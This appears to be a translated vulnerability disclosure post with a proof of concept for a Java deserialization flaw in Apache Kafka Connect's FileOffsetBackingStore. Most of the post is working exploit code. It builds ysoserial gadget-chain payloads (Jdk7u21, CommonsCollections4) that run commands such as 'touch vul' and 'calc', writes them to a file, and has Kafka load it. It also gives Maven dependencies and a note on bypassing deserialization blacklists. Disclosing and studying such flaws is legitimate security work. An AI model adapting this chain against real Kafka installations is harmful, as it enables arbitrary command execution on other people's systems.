The author directly gives the vulnerability POC: CVE IDS request for Apache Kafka deserialization vulnerability via runtime
import junit.framework.Test;
import junit.framework.TestCase;
import junit.framework.TestSuite;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.Jdk7u21;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;
public void test_Kafka_Deser() throws Exception {
StandaloneConfig config;
String projectDir = System.getProperty("user.dir");
Jdk7u21 jdk7u21 = new Jdk7u21();
Object o = jdk7u21.getObject("touch vul");
byte[] ser = serialize(o);
File tempFile = new File(projectDir + "/payload.ser");
FileUtils.writeByteArrayToFile(tempFile, ser);
Map<String, String> props = new HashMap<String, String>();
props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG,
tempFile.getAbsolutePath());
props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
config = new StandaloneConfig(props);
FileOffsetBackingStore restore = new FileOffsetBackingStore();
restore.configure(config);
restore.start();
}
private byte[] serialize(Object object) throws IOException {
ByteArrayOutputStream bout = new ByteArrayOutputStream();
ObjectOutputStream out = new ObjectOutputStream(bout);
out.writeObject(object);
out.flush();
return bout.toByteArray();
}
I consulted the R & D personnel and said that there was no class in their code. This deserialization should be used to bypass some blacklists. Similar to marshaledobject class bypass Weblogic.
class
MarshalledObject
The test case in the source code through global search also has a vulnerable writing method. Do you know if there are other usage scenarios for this class? We can communicate with each other.
Build environment test:
package ysoserial.exploit;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.CommonsCollections4;
import ysoserial.payloads.Jdk7u21;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;
public class KafkaExploitTest {
public static void test_Kafka_Deser() throws Exception {
StandaloneConfig config;
String projectDir = System.getProperty("user.dir");
CommonsCollections4 cc4 = new CommonsCollections4();
Object o = cc4.getObject("calc");
byte[] ser = serialize(o);
File tempFile = new File(projectDir + "/payload.ser");
FileUtils.writeByteArrayToFile(tempFile, ser);
Map<String, String> props = new HashMap<String, String>();
props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG, tempFile.getAbsolutePath());
props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG, "org.apache.kafka.connect.json.JsonConverter");
config = new StandaloneConfig(props);
FileOffsetBackingStore restore = new FileOffsetBackingStore();
restore.configure(config);
restore.start();
}
private static byte[] serialize(Object object) throws IOException {
ByteArrayOutputStream bout = new ByteArrayOutputStream();
ObjectOutputStream out = new ObjectOutputStream(bout);
out.writeObject(object);
out.flush();
return bout.toByteArray();
}
public static void main(String[] args) throws Exception{
KafkaExploitTest.test_Kafka_Deser();
}
}
Pom.xml add dependency:
<!-- https://mvnrepository.com/artifact/org.apache.kafka/connect-runtime -->
<dependency>
<groupId>org.apache.kafka</groupId>
<artifactId>connect-runtime</artifactId>
<version>0.11.0.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.apache.kafka/connect-json -->
<dependency>
<groupId>org.apache.kafka</groupId>
<artifactId>connect-json</artifactId>
<version>0.11.0.0</version>
<scope>test</scope>
</dependency>
Vulnerability Demo:
[@Test](/user/Test)
public void testSaveRestore() throws Exception {
Callback<Void> setCallback = expectSuccessfulSetCallback();
Callback<Map<ByteBuffer, ByteBuffer>> getCallback = expectSuccessfulGetCallback();
PowerMock.replayAll();
store.set(firstSet, setCallback).get();
store.stop();
// Restore into a new store to ensure correct reload from scratch
FileOffsetBackingStore restore = new FileOffsetBackingStore();
restore.configure(config);
restore.start();
Map<ByteBuffer, ByteBuffer> values = restore.get(Arrays.asList(buffer("key")), getCallback).get();
assertEquals(buffer("value"), values.get(buffer("key")));
PowerMock.verifyAll();
}
Avro or JSON are mostly used for business serialization. If you use JDK native mode, you should use this function for deserialization.